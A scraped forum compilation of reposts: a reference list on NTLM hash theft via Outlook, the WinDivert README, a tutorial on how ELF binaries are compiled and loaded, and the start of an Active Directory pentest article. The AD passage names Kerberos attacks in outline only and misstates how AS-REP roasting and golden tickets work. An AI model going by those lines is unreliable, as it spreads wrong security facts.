https://insights.sei.cmu.edu/cert/2018/04/automatically-stealing-password-hashes-with-microsoft-outlook-and-ole.html [2] https://blog.blazeinfosec.com/leveraging-web-application-vulnerabilities-to-steal-ntlm-hashes-2/ [3] http://insecure.org/sploits/winnt.automatic.authentication.html [4] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170014 [5] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/smb-hash-hijacking-and-user-tracking-in-ms-outlook/ [6] https://medium.com/@ValdikSS/deanonymizing-windows-users-and-capturing-microsoft-and-vpn-accounts-f7e53fe73834 [7] http://witch.valdikss.org.ru/ [8] https://social.technet.microsoft.com/wiki/contents/articles/32346.azure-summary-of-isps-that-allow-disallow-access-from-port-445.aspx [9] https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html Sursa: https://blog.blazeinfosec.com/love-letters-from-the-red-team-from-e-mail-to-ntlm-hashes-with-microsoft-outlook/
-
- 1
-
-
WinDivert 2.0: Windows Packet Divert ==================================== 1. Introduction --------------- Windows Packet Divert (WinDivert) is a user-mode packet interception library for Windows 7, Windows 8 and Windows 10. WinDivert enables user-mode capturing/modifying/dropping of network packets sent to/from the Windows network stack. In summary, WinDivert can: - capture network packets - filter/drop network packets - sniff network packets - (re)inject network packets - modify network packets WinDivert can be used to implement user-mode packet filters, sniffers, firewalls, NATs, VPNs, IDSs, tunneling applications, etc.. WinDivert supports the following features: - packet interception, sniffing, or dropping modes - support for loopback (localhost) traffic - full IPv6 support - network layer - simple yet powerful API - high-level filtering language - filter priorities - freely available under the terms of the GNU Lesser General Public License (LGPLv3) For more information see doc/windivert.html 2. Architecture --------------- The basic architecture of WinDivert is as follows: +-----------------+ | | +------->| PROGRAM |--------+ | | (WinDivert.dll) | | | +-----------------+ | | | (3) re-injected | (2a) matching packet | packet | | | | [user mode] | | ....................|...................................|................... [kernel mode] | | | | | | +---------------+ +-----------------> (1) packet | | (2b) non-matching packet ------------>| WinDivert.sys |--------------------------------------------> | | +---------------+ The WinDivert.sys driver is installed below the Windows network stack. The following actions occur: (1) A new packet enters the network stack and is intercepted by WinDivert.sys (2a) If the packet matches the PROGRAM-defined filter, it is diverted. The PROGRAM can then read the packet using a call to WinDivertRecv(). (2b) If the packet does not match the filter, the packet continues as normal. (3) PROGRAM either drops, modifies, or re-injects the packet. PROGRAM can re-inject the (modified) using a call to WinDivertSend(). 3. License ---------- WinDivert is dual-licensed under your choice of the GNU Lesser General Public License (LGPL) Version 3 or the GNU General Public License (GPL) Version 2. See the LICENSE file for more information. 4. About -------- WinDivert was written by basil. For further information, or bug reports, please contact: basil@reqrypt.org The homepage for WinDivert is: https://reqrypt.org/windivert.html The source code for WinDivert is hosted by GitHub at: https://github.com/basil00/Divert Sursa: https://github.com/basil00/Divert
-
Life of a binary Written on April 15th, 2017 by Kishu Agarwal Almost every one of you must have written a program, compiled it and then ran it to see the fruits of your hard labour. It feels good to finally see your program working, isn’t it? But to make all of this work, we have someone else to thankful too. And that is your compiler (of course, assuming that you are working in a compiled language, not an interpreted one) which also does so much hard work behind the scenes. In this article, I will try to show you how the source code that you write is transformed into something that your machine is actually able to run. I am choosing Linux as my host machine and C as the programming language here, but the concepts here are general enough to apply to many compiled languages out there. Note: If you want to follow along in this article, then you will have to make sure that you have gcc, elfutils installed on your local machine. Let’s start with a simple C program and see how it get’s converted by the compiler. #include <stdio.h> // Main function int main(void) { int a = 1; int b = 2; int c = a + b; printf("%d\n", c); return 0; } view raw sample.c hosted with ❤ by GitHub This program creates two variables, adds them up and print the result on the screen. Pretty simple, huh? But let’s see what this seemingly simple program has to go through to finally get executed on your system. Compiler has usually the following five steps (with the last step being part of the OS)- Preprocessing <font style="font-size: 14px">Preprocessing</font> Compilation <font style="font-size: 14px">Compilation</font> Assembly <font style="font-size: 14px">Assembly</font> Linking [Not supported by viewer] Loading [Not supported by viewer] Let’s go through each of the step in sufficient detail. Preprocessing <font style="font-size: 14px" color="#ffffff">Preprocessing</font> Compilation <font style="font-size: 14px">Compilation</font> Assembly <font style="font-size: 14px">Assembly</font> Linking [Not supported by viewer] Loading [Not supported by viewer] First step is the Preprocessing step which is done by the Preprocessor. Job of the Preprocessor is to handle all the preprocessor directives present in your code. These directives start with #. But before it processes them, it first removes all the comments from the code as comments are there only for the human readability. Then it finds all the # commands, and does what the commands says. In the code above, we have just used #include directive, which simply says to the Preprocesssor to copy the stdio.h file and paste it into this file at the current location. You can see the output of the Preprocessor by passing -E flag to the gcc compiler. gcc -E sample.c You would get something like the following- # 1 "sample.c" # 1 "<built-in>" # 1 "<command-line>" # 1 "/usr/include/stdc-predef.h" 1 3 4 # 1 "<command-line>" 2 # 1 "sample.c" # 1 "/usr/include/stdio.h" 1 3 4 -----omitted----- # 5 "sample.c" int main(void) { int a = 1; int b = 2; int c = a + b; printf("%d\n", c); return 0; } view raw preprocessor_output.txt hosted with ❤ by GitHub Preprocessing <font style="font-size: 14px" color="#ffffff">Preprocessing</font> Compilation [Not supported by viewer] Assembly <font style="font-size: 14px">Assembly</font> Linking [Not supported by viewer] Loading [Not supported by viewer] Confusingly, the second step is also called compilation. The compiler takes the output from the Preprocessor and is responsbile to do the following important tasks. Pass the output through a lexical analyser to identify various tokens present in the file. Tokens are just literals present in your program like ‘int’, ‘return’, ‘void’, ‘0’ and so on. Lexical Analyser also associates with each token the type of the token, whether the token is a string literal, integer, float, if token, and so on. Pass the output of the lexical analyser to the syntax analyser to check whether the program is written in a way that satisfy the grammar rules of the language the program is written in. For example, it will raise syntax error when parsing this line of code, b = a + ; since + is a missing one operand. Pass the output of the syntax analyser to the semantic analyser, which checks whether the program satisfies semantics of the language like type checking and variables are declared before their first usage, etc. If the program is syntactically correct, then the source code is converted into the assembly intructions for the specified target architecture. By default, it generates assembly for the machine it is running on. But suppose, you are building programs for embedded systems, then you can pass the architecture of the target machine and gcc will generate assembly for that machine. To see the output from this stage, pass the -S flag to the gcc compiler. gcc -S sample.c You would get something like the following depending upon on your environment. .file "sample.c" // name of the source file .section .rodata // Read only data .LC0: // Local constant .string "%d\n" // string constant we used .text // beginning of the code segment .globl main // declare main symbol to be global .type main, @function // main is a function main: // beginning of main function .LFB0: // Local function beginning .cfi_startproc // ignore them pushq %rbp // save the caller's frame pointer .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rsp, %rbp // set the current stack pointer as the frame base pointer .cfi_def_cfa_register 6 subq $16, %rsp // set up the space movl $1, -12(%rbp) movl $2, -8(%rbp) movl -12(%rbp), %edx movl -8(%rbp), %eax addl %edx, %eax movl %eax, -4(%rbp) movl -4(%rbp), %eax movl %eax, %esi movl $.LC0, %edi movl $0, %eax call printf movl $0, %eax leave .cfi_def_cfa 7, 8 ret // return from the function .cfi_endproc .LFE0: .size main, .-main // size of the main function .ident "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609" .section .note.GNU-stack,"",@progbits // make stack non-executable view raw sample.s hosted with ❤ by GitHub If you don’t know assembly language, it all looks pretty scary at first, but it is not that bad. It takes more time to understand the assembly code than your normal high level language code, but given enough time, you can surely read it. Let’s see what this file contains. All the lines beginning with ‘.’ are the assembler directives. .file denotes the name of the source file, which can be used for debugging purposes. The string literal in our source code %d\n now resides in the .rodata section (ro means read-only), since it is a read only string. The compiler named this string as LC0, to later refer to it in the code. Whenever you see a label starting with .L, it means that those labels are local to the current file and will not visible to the other files. .globl tells that main is a global symbol, which means that the main can be called from other files. .type tells that main is a function. Then follows the assembly for the main function. You can ignore the directives starting with cfi. They are used for call stack unwinding in case of exceptions. We will ignore them in this article, but you can know more about them here. Let’s try to understand now the disassembly of the main function. rbp [Not supported by viewer] rsp [Not supported by viewer] Before main function call Fig. 1 [Not supported by viewer] rsp,rbp <font style="font-size: 20px">rsp,rbp</font> Let's call it X [Not supported by viewer] X [Not supported by viewer] X [Not supported by viewer] rbp [Not supported by viewer] Value of c [Not supported by viewer] Value of b [Not supported by viewer] Value of a [Not supported by viewer] rsp [Not supported by viewer] rbp-12 [Not supported by viewer] rbp-8 [Not supported by viewer] rbp-4 [Not supported by viewer] rbp-4 [Not supported by viewer] Setting Local variables Fig. 3 [Not supported by viewer] Saving Caller's function frame pointer Fig. 2 [Not supported by viewer] 11. You must be knowing that when you call a function, a new stack frame is created for that function. To make that possible, we need some way of knowing the start of the caller’s function frame pointer when the new function returns. That’s why we push the current frame pointer which is stored in the rbp register onto the stack. 14 Move the current stack pointer into the base pointer. This becomes our current function frame pointer. Fig. 1 depicts the state before pushing the rbp register and Fig. 2 shows after the previous frame pointer is pushed and the stack pointer is moved to the current frame pointer. 16 We have 3 local variables in our program, all of types int. On my machine, each int occupies 4 bytes, so we need 12 bytes of space on the stack to hold our local variables. The way we create space for our local variables on the stack, is decrement our stack pointer by the number of bytes we need for our local variables. Decrement, because stack grows from higher addresses to lower addresses. But here you see we are decrementing by 16 instead of 12. The reason is, space is allocated in the chunks of 16 bytes. So, even if you have 1 local variable, space of 16 bytes would be allocated on the stack. This is done for performance reasons on some architecures. See Fig. 3 to see how the stack is laid out right now. 17-22 This code is pretty straight forward. The compiler has used the slot rbp-12 as the storage for variable a, rbp-8 for b and rbp-4 for c. It moves the the values 1 and 2 to address of variable a and b respectively. To prepare for the addition, it moves the b value to edx register and the value of the a register to the eax register. The result of the addition is stored in the eax register which is later transferred to the address of the c variable. 23-27 Then we prepare for our printf call. Firstly, the value of the c variable is moved to the esi register. And then address of our string constant %d\n is moved to the edi register. esi and edi registers now hold the argument of our printf call. edi holds the first argument and esi holds the second argument. Then we call the printf function to print the value of the variable c formatted as the integer value. Point to note here is that printf symbol is undefined at this point. We would see how this printf symbol gets resolved later on in this article. .size tells the size of the main function in bytes. “.-main” is an expression where the . symbol means the address of the current line. So this expression evaluates to current_address_of the line - address of the main function which gives us the size of the main function in bytes. .ident just tell the assembler to add the following line in the .comment section. .note.GNU-stack is used for telling whether the stack for this program is executable or not. Mostly the value for this directive is null string, which tells the stack is not executable. Preprocessing <font style="font-size: 14px" color="#ffffff">Preprocessing</font> Compilation [Not supported by viewer] Assembly [Not supported by viewer] Linking [Not supported by viewer] Loading [Not supported by viewer] What we have right now is our program in the assembly language, but it is still in the language which is not understood by the processors. We have to convert the assembly language to the machine language, and that work is done by the Assembler. Assembler takes your assembly file and produces an object file which is a binary file containing the machine instructions for your program. Let’s convert our assembly file to the object file to see the process in action. To get the object file for your program, pass the c flag to the gcc compiler. gcc -c sample.c You would get a object file with an extension of .o. Since, this is a binary file, you won’t be able to open it in a normal text editor to view it’s contents. But we have tools at our disposal, to find out what is lying inside in those object files. Object files could have many different file formats. We will be focussing on one in particular which is used on the Linux and that is the ELF file format. ELF files contains following information- ELF Header Program header table Section header table Some other data referred to by the previous tables ELF Header contains some meta information about the object file such as type of the file, machine against which binary is made, version, size of the header, etc. To view header, just pass -h flag to eu-readelf utility. $ eu-readelf -h sample.o ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Ident Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: REL (Relocatable file) Machine: AMD x86-64 Version: 1 (current) Entry point address: 0 Start of program headers: 0 (bytes into file) Start of section headers: 704 (bytes into file) Flags: Size of this header: 64 (bytes) Size of program header entries: 0 (bytes) Number of program headers entries: 0 Size of section header entries: 64 (bytes) Number of section headers entries: 13 Section header string table index: 10 view raw elf_header.sh hosted with ❤ by GitHub From the above listing, we see that this file doesn’t have any Program Headers and that is fine. Program Headers are only present in the executable files and shared libraries. We will see Program Headers when we link the file in the next step. But we do have 13 sections. Let’s see what are these sections. Use the -S flag. $ eu-readelf -S sample.o There are 13 section headers, starting at offset 0x2c0: Section Headers: [Nr] Name Type Addr Off Size ES Flags Lk Inf Al [ 0] NULL 0000000000000000 00000000 00000000 0 0 0 0 [ 1] .text PROGBITS 0000000000000000 00000040 0000003c 0 AX 0 0 1 [ 2] .rela.text RELA 0000000000000000 00000210 00000030 24 I 11 1 8 [ 3] .data PROGBITS 0000000000000000 0000007c 00000000 0 WA 0 0 1 [ 4] .bss NOBITS 0000000000000000 0000007c 00000000 0 WA 0 0 1 [ 5] .rodata PROGBITS 0000000000000000 0000007c 00000004 0 A 0 0 1 [ 6] .comment PROGBITS 0000000000000000 00000080 00000035 1 MS 0 0 1 [ 7] .note.GNU-stack PROGBITS 0000000000000000 000000b5 00000000 0 0 0 1 [ 8] .eh_frame PROGBITS 0000000000000000 000000b8 00000038 0 A 0 0 8 [ 9] .rela.eh_frame RELA 0000000000000000 00000240 00000018 24 I 11 8 8 [10] .shstrtab STRTAB 0000000000000000 00000258 00000061 0 0 0 1 [11] .symtab SYMTAB 0000000000000000 000000f0 00000108 24 12 9 8 [12] .strtab STRTAB 0000000000000000 000001f8 00000016 0 0 0 1 view raw elf_section.sh hosted with ❤ by GitHub You don’t need to understand whole of the above listing. But essentially, for each section, it lists various information, like the name of the section, size of the section and the offset of the section from the start of the file. Important sections for our use are the following- text section contains our machine code rodata section contains the read only data in our program. It may be constants or string literals that you may have used in your program. Here it just contains %d\n data sections contains the initialized data of our program. Here it is empty, since we don’t have any initialized data bss section is like the data section but contains the uninitialized data of our program. Uninitalized data could be a array declared like int arr[100], which becomes part of this section. One point to note about the bss section is that, unlike the other sections which occupy space depending upon their content, bss section just contain the size of the section and nothing else. The reason being at the time of loading, all that is needed is the count of bytes that we need to allocate in this section. In this way we reduce the size of the final executable strtab section list all the strings contained in our program symtab section is the symbol table. It contains all the symbols(variable and function names) of our program. rela.text section is the relocation section. More about this later. You can also view the contents of these sections, just pass the corresponding section number to the eu-readelf program. You can also use the objdump tool. It can also provide you with the dissembly for some of the sections. Let’s talk in little more detail about the rela.text section. Remember the printf function that we used in our program. Now, printf is something that we haven’t defined by ourself, it is part of the C library. Normally when you compile your C programs, the compiler will compile them in a way so that C functions that you call are not bundled in with your executable, which thus reduces the size of the final executable. Instead a table is made of all those symbols, called a, relocation table, which is later filled by something in called the loader. We will discuss more about the loader part later on, but for now, the important thing is that the if you look at the rela.text section, you would find the printf symbol listed down there. Let’s confirm that once here. $ eu-readelf -r sample.o Relocation section [ 2] '.rela.text' for section [ 1] '.text' at offset 0x210 contains 2 entries: Offset Type Value Addend Name 0x0000000000000027 X86_64_32 000000000000000000 +0 .rodata 0x0000000000000031 X86_64_PC32 000000000000000000 -4 printf Relocation section [ 9] '.rela.eh_frame' for section [ 8] '.eh_frame' at offset 0x240 contains 1 entry: Offset Type Value Addend Name 0x0000000000000020 X86_64_PC32 000000000000000000 +0 .text view raw elf_relocation.sh hosted with ❤ by GitHub You can ignore the second relocation section .rela.eh_frame. It has to do with exception handling, which is not of much interest to us here. Let’s see the first section there. There we can see two entries, one of which is our printf symbol. What does this entry mean is that, there is a symbol used in this file with a name of printf but has not been defined, and that symbol is located in this file at the offset 0x31 from the start of the .text section. Let’s check what is at the offset 0x31 right now in the .text section. $ eu-objdump -d -j .text sample.o sample.o: elf64-elf_x86_64 Disassembly of section .text: 0: 55 push %rbp 1: 48 89 e5 mov %rsp,%rbp 4: 48 83 ec 10 sub $0x10,%rsp 8: c7 45 f4 01 00 00 00 movl $0x1,-0xc(%rbp) f: c7 45 f8 02 00 00 00 movl $0x2,-0x8(%rbp) 16: 8b 55 f4 mov -0xc(%rbp),%edx 19: 8b 45 f8 mov -0x8(%rbp),%eax 1c: 01 d0 add %edx,%eax 1e: 89 45 fc mov %eax,-0x4(%rbp) 21: 8b 45 fc mov -0x4(%rbp),%eax 24: 89 c6 mov %eax,%esi 26: bf 00 00 00 00 mov $0x0,%edi 2b: b8 00 00 00 00 mov $0x0,%eax 30: e8 00 00 00 00 callq 0x35 <<<<<< offset 0x31 35: b8 00 00 00 00 mov $0x0,%eax 3a: c9 leaveq 3b: c3 retq view raw main_objdump.o hosted with ❤ by GitHub Here you can see the call instruction at offset 0x30. e8 stands for the opcode of the call instruction followed by the 4 bytes from offset 0x31 to 0x34, which should correspond to our printf function actual address which we don’t have right now, so they are just 00’s. (Later on, we will see that is location doesn’t actually hold the printf address, but indirectly calls it using something called plt table. We will cover this part later) Preprocessing <font style="font-size: 14px" color="#ffffff">Preprocessing</font> Compilation [Not supported by viewer] Assembly [Not supported by viewer] Linking [Not supported by viewer] Loading [Not supported by viewer] All the things that we have done till now have worked on a single source file. But in reality, that is the rarely the case. In real production code, you have hundred’s of thousand’s of source code files which you would need to compile and create a executable. Now how the steps that we followed till now would compare in that case? Well, the steps would all remain the same. All the source code files would individually get preprocessed, compiled, assembed and we would get separate object code files at the end. Now each source code file wouldn’t have been written in isolation. They must have some functions, global variables which must be defined in some file and used at different locations in other files. It is the job of the linker to gather all the object files, go through each of them and track which symbol does each file defines and which symbols does it uses. It could find all these information in the symbol table in each of the object files. After gathering all these information, the linker creates a single object file combining all the sections from each of the individual object files into their corresponding sections and relocating all the symbols that can be resolved. In our case, we don’t have collection of source files, we have just one file, but since we use printf function from the C library, our source file will by dynamically linked with the C library. Let’s now link our program and further investigate the output. gcc sample.c I won’t go into much detail here, since it is also a ELF file that we saw above, with just some new sections. One thing to note here is, when we saw the object file that we got from the assembler, the addresses that we saw were relative. But after having linked all the files, we have pretty much idea, where all the pieces go and thus, if you examine the output of these stage, it contains absolute addresses also. At this stage, linker has identified all the symbols that are being used in our program, who uses those symbols, and who has defined those symbols. Linker just maps the address of the definition of the symbol to the usage of the symbol. But after doing all this, there still exists some symbols that are not yet resolved at this point, one of the being our printf symbol. In general, these are such symbols which are either externally defined variables or externally defined functions. Linker also creates a relocation table, the same as that was created by the Assembler, with those entries which are still unresolved. At this point, there is one thing you should know. The functions and data you use from other libraries, can be statically linked or dynamically linked. Static linking means that the functions and data from those libraries would be copied and pasted into your executable. Whereas, if you do dynamic linking, then those functions and data are not copied into your executable, thus reducing your final executable size. For a libray to have facility of dyamic linking against it, the library must be a shared library (so file). Normally, the common libraries used by many programs comes as shared libraries and one of them is our libc library. libc is used by so many programs that if every program started to statically link against it, then at any point, there would be so many copies of the same code occupying space in your memory. Having dynamic linking saves this problem, and at any moment only one copy of the libc would be occupying space in the memory and all the programs would be referencing from that shared library. To make the dynamic linking possible, the linker creates two more sections that weren’t there in the object code generated by the assembler. These are the .plt (Procedure Linkage table) and the .got (Global Offset Table) sections. We will cover about these sections when we come to loading our executable, as these sections come useful when we actually load the executable. Preprocessing <font style="font-size: 14px" color="#ffffff">Preprocessing</font> Compilation [Not supported by viewer] Assembly [Not supported by viewer] Linking [Not supported by viewer] Loading [Not supported by viewer] Now it is time to actually run our executable file. When you click on the file in your GUI, or run it from the command line, indirectly execev system call is invoken. It is this system call, where the kernel starts the work of loading your executable in the memory. Remember the Program Header Table from above. This is where it is very useful. $ eu-readelf -l a.out Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align PHDR 0x000040 0x0000000000400040 0x0000000000400040 0x0001f8 0x0001f8 R E 0x8 INTERP 0x000238 0x0000000000400238 0x0000000000400238 0x00001c 0x00001c R 0x1 [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2] LOAD 0x000000 0x0000000000400000 0x0000000000400000 0x000724 0x000724 R E 0x200000 LOAD 0x000e10 0x0000000000600e10 0x0000000000600e10 0x000228 0x000230 RW 0x200000 DYNAMIC 0x000e28 0x0000000000600e28 0x0000000000600e28 0x0001d0 0x0001d0 RW 0x8 NOTE 0x000254 0x0000000000400254 0x0000000000400254 0x000044 0x000044 R 0x4 GNU_EH_FRAME 0x0005f8 0x00000000004005f8 0x00000000004005f8 0x000034 0x000034 R 0x4 GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10 GNU_RELRO 0x000e10 0x0000000000600e10 0x0000000000600e10 0x0001f0 0x0001f0 R 0x1 Section to Segment mapping: Segment Sections... 00 01 [RO: .interp] 02 [RO: .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame] 03 [RELRO: .init_array .fini_array .jcr .dynamic .got] .got.plt .data .bss 04 [RELRO: .dynamic] 05 [RO: .note.ABI-tag .note.gnu.build-id] 06 [RO: .eh_frame_hdr] 07 08 [RELRO: .init_array .fini_array .jcr .dynamic .got] view raw elf_pht.sh hosted with ❤ by GitHub How would the kernel know where to find this table in the file? Well, that information could be found in the ELF Header which always starts at offset 0 in the file. Having done that, kernel looks up all the entries which are of type LOAD and loads them into the memory space of the process. As you can see from the above listing, there are two entries of type LOAD. You can also see which sections are contained in each segment. Modern operating systems and processors manage memory in terms of pages. Your computer memory is divided into fixed size chunks and when any process asks for some memory, the operating system allots some number of pages to that process. Apart from the benefit of managing memory efficiently, this also has the benefit of providing security. Operating systems and kernel can set protection bits for each page. Protection bits specifies whether the particular page is Read only, could be written or can be executed. A page whose protection bit is set as Read only, can’t be modified and thus prevents from intentional or unintentional modification of data. Read only pages have also one benefit that multiple running processes for the same program can share the same pages. Since the pages are read only, no running process can modify those pages and thus, every process would work just fine. To set up these protection bits we somehow would have to tell the kernel, which pages have to be marked Read only and which could be Written and Executed. These information is stored in the Flags in each of the entries above. Notice the first LOAD entry. It is marked as R and E, which means that these segment could be read and executed but can’t be modified and if you look down and see which sections come in these segment, you can see two familiar sections there, .text and .rodata. Thus our code and read-only data can only be read and executed but can’t be modified which is what should happen. Similary, second LOAD entry contains the initialized and non initialized data, GOT table (more on this later) which are marked as RW and thus can be read and written but can’t be executed. After loading these segments and setting up their permissions, the kernel checks if there is .interp segment or not. In the statically linked executable, there is no need for this segment, since the executable contains all the code that it needs, but for the dynamically linked executable, this segment is important. This segment contains the .interp section which contains the path to the dynamic linker. (You can check that there is no .interp segment in the statically linked executable by passing -static flag to the gcc compiler and checking the header table in the resulting executable) In our case, it would find one and it points to the dynamic linker at this path /lib64/ld-linux-x86-64.so.2. Similarly to our executable, the kernel would start loading these shared object by reading the header, finding its segments and loading them in the memory space of the our current program. In statically linked executable where all this is not needed, the kernel would have given control to our program, here the kernel gives control to the dynamic linker and pushes the address of our main function to be called on the stack, so that after dynamic linker finishes it’s job, it knows where to hand over the control to. We should now understand the two tables we have been skipping over for too long now, Procedure Linkage Table and Global Offset Table as these are closely related to the function of dynamic linker. There might be two types of relocations needed in your program. Variables relocations and function relocations. For a variable which is externally defined, we include that entry in the GOT table and the functions which are externally defined we include those entries in both the tables. So, essentially, GOT table has entries for all the externally defined variables as well as functions, and PLT table has entries for only the functions. The reason why we have two entries for functions will be clear by the following example. Let us take an example of printf function to see how these tables works. In our main function, let’s see the call instruction to printf function. 400556: e8 a5 fe ff ff callq 0x400400 This call instruction is calling an address which is part of the .plt section. Let’s see what is there. $ objdump -d -j .plt a.out a.out: file format elf64-x86-64 Disassembly of section .plt: 00000000004003f0 <printf@plt-0x10>: 4003f0: ff 35 12 0c 20 00 pushq 0x200c12(%rip) # 601008 <_GLOBAL_OFFSET_TABLE_+0x8> 4003f6: ff 25 14 0c 20 00 jmpq *0x200c14(%rip) # 601010 <_GLOBAL_OFFSET_TABLE_+0x10> 4003fc: 0f 1f 40 00 nopl 0x0(%rax) 0000000000400400 <printf@plt>: 400400: ff 25 12 0c 20 00 jmpq *0x200c12(%rip) # 601018 <_GLOBAL_OFFSET_TABLE_+0x18> 400406: 68 00 00 00 00 pushq $0x0 40040b: e9 e0 ff ff ff jmpq 4003f0 <_init+0x28> 0000000000400410 <__libc_start_main@plt>: 400410: ff 25 0a 0c 20 00 jmpq *0x200c0a(%rip) # 601020 <_GLOBAL_OFFSET_TABLE_+0x20> 400416: 68 01 00 00 00 pushq $0x1 40041b: e9 d0 ff ff ff jmpq 4003f0 <_init+0x28> view raw elf_plt_printf.sh hosted with ❤ by GitHub For each externally defined function, we have an entry in the plt section and all look the same and have three instructions, except the first entry. This is a special entry which we will see the use of later. There we find a jump to the value contained at the address 0x601018. These address is an entry in the GOT table. Let’s see the content of these address. $ objdump -s a.out | grep -A 3 '.got.plt' Contents of section .got.plt: 601000 280e6000 00000000 00000000 00000000 (.`............. 601010 00000000 00000000 06044000 00000000 ..........@..... 601020 16044000 00000000 ..@..... view raw elf_got_printf.sh hosted with ❤ by GitHub This is where the magic happens. Except the first time when the printf function is called, the value at this address would be the actual address of the printf function from the C library and we would simply jump to that location. But for the first time, something else happens. When printf function is called for the first time, value at this location is the address of the next instruction in the plt entry of the printf function. As you can see from the above listing, it is 400406 which is stored in little endian format. At this location in the plt entry, we have a push instruction which pushes 0 onto the stack. Each plt entry have same push instruction but they push different numbers. 0 here denotes the offset of the printf symbol in the relocation table. The push instruction is then followed by the jump instruction which jumps to the first instruction in the first plt entry. Remember from above, when I told you that the first entry is special. It is because here where the dynamic linker is called to resolve the external symbols and relocate them. To do that, we jump to the address contained in the address 601010 in the got table. These address should contain the address of the dynamic linker routine to handle the relocation. Right now these entry is filled with 0’s, but this address is filled by the linker when the program actually runs and the kernel calls the dynamic linker. When the routine is called, linker would resolve the symbol that was pushed earlier(in our case, 0), from external shared objects and put the correct address of the symbol in the got table. So, from now on, when the printf function is called, we don’t have to consult the linker, we can directly jump from plt to our printf function in the C library. This process is called lazy loading. A program may contain many external symbols, but it may not call of them in one run of the program. So, the symbols resolution is deferred till the actual use and this save us some program startup time. As you can see from the above discussion, we never had to modify the plt section, but only the got section. And that is why plt section is in the first LOAD segment and marked as Read only, while got section is in the second LOAD segment and marked Write. And this is how dynamic linker works. I have skipped over lots of gory details but if you are interested in knowing in more detail, then you can checkout this article. Let’s go back to our program loading. We have already done most of the work. Kernel has loaded all the loadable segments, has invoked the dynamic linker. All that is left is to invoke our main function. And that work is done by the linker after it finishes. And when it calls our main function we get the following output in our terminal- 3 And that my friend, is bliss. Thank you for reading my article. Let me know if you liked my article or any other suggestions for me, in the comments section below. And please, feel free to share Sursa: https://kishuagarwal.github.io/life-of-a-binary.html
-
Exploring, Exploiting Active Directory Pen Test Posted on April 20, 2019 by Rajasekar A Active Directory (Pen Test ) is most commonly used in the Enterprise Infrastructure to manage 1000’s of computers in the organization with a single point of control as “Domain Controller”. Performing Penetration Testing of Active Directory is more interesting and are mainly targeted by many APT Groups with a lot of different techniques. We will focus on the basics of Active Directory to understand its components before the attack. Understanding the Active Directory and its Components Directory Service: A Directory Service is a hierarchical structure which map the names of all resources in the network to its network address. It allows store, organize and manage all the network resources and define a naming structure. It makes easier to manage all the devices from a single system Active Directory: Active Directory is a Microsoft Implementation of Directory services. It follows x.500 specification and it works on the application layer of the OSI model. It allows administrators to control all the users and resources in the network from a single server. It stores information about all the users and resources in the network in a single database Directory Service Database. Active Directory at its uses “Kerberos” for Authentication of the users and LDAP for retrieving the directory information. Domain Controller (DC) A Domain Controller is a Windows Server running Active Directory Directory Services in a domain. All the users, user’s information, computers and its policies are controlled by a Domain Controller. Every User must authenticate with the “Domain Controller” to access any resource or service in a domain. It defines the policies for all the users what actions needs can be performed and what level of privileges to be granted etc. It makes the life of administrators easy to manage the users and the computers in the network. Naming Conventions in AD: An Object can be any network resource in the Active Directory Domain. These objects can be Computers, Users, printers etc. A Domain is a logical grouping of objects in the organization. It defines the security boundary and allows objects within the boundary to share the data among each other. It stores information about all the objects within the domain in the domain controller. A Tree is a collection of one or more domains. All domains within a single tree share a common schema and Global Catalogue which is a Central Repository of information about all the objects. A forest is a collection of one or more trees which share a common Directory Schema, Global Catalogue and Configurations across the organization Kerberos Authentication: Kerberos is an authentication protocol which is used for Single Sign-on (SSO) purposes. The concept of SSO is to authenticate once and use the token to access any service for which you are authorized to. Kerberos Authentication Process follows: Step1: The User sends an “Authentication Service Request (AS_REQ)” to “Key Distribution Centre”(KDC) for “Ticket Granting Ticket (TGT)” with the “User Principle Name (UPN)” and current Timestamp which is encrypted with User password. Step2: KDC decrypts the request (AS_REQ) with the local copy of the User’s password stored in the database and checks the UPN and Timestamp. After verification, it will respond with a reply (AS_REP). It has two levels of encryption one has TGT which is encrypted with KDC’s password and second is Session Key along with expiry Timestamp is encrypted with hash of the user’s password. Step3: Now the User’s machine will cache the TGT and Session Key. This TGT is used when requesting for a service. The session key is being used for further communication with KDC which does not require credentials. All the resources in the domain are available as a service and require service ticket for the same. Step4: Now User’s Machine send a request(TGS_REQ) to KDC for Ticket Granting Service(TGS) along with TGT, Service Principle Name(SPN) which contains the name of the service and its IP Address and port number and Timestamp which is encrypted with session key received in Step2. Step5: KDC will decrypt the request with User’s Session Key and checks the SPN, Timestamp and TGT which is encrypted with the KDC password. If all the details are valid, it will send a reply (TGS_REP) with the TGS encrypted with the password hash of the service provider, Ticket Expiry Timestamp encrypted with AS_REP Session key. Step6: User’s machine will decrypt the request with the session key and extract the TGS ticket. User’s Machine will forward this ticket to the Application as a (AP_REQ), the application decrypts the request with its password and extract the session key and other attributes about the client regarding privileges and groups. It verifies these details and grants the access to the application. This is the total process of the Kerberos authentication implemented in the Active Directory. Attacks on Kerberos: Silver Tickets are the Ticket Granting Service (TGS) which is obtained from the KDC can be forged and is effectively cracked offline to compromise the service machine Golden Tickets are the Ticket Granting Ticket (TGT) which is obtained from the KDC on the AS_REP. It can be forged and cracked offline to compromise the KDC Roasting AS-REP can be performed when the server disables DONT_REQ_PREAUTH, an attacker can request the KDC on behalf of the machine and crack the password offline LDAP is a Lightweights Directory Access Protocol which acts as a communication protocol that defines the methods for accessing the directory services in a domain. It defines the way that data should be presented to the users, it includes various components such as Attributes, Entries, and Directory Information Tree. Reconnaissance: SPN Scanning instead of Port Scanning of all the machines Active Directory can be enumerated in multiple ways as follows: Active Directory can be enumerated even without a Domain Account Active Directory can be enumerated to gather all the Domain and Forests Information, Forest and Domain Trusts 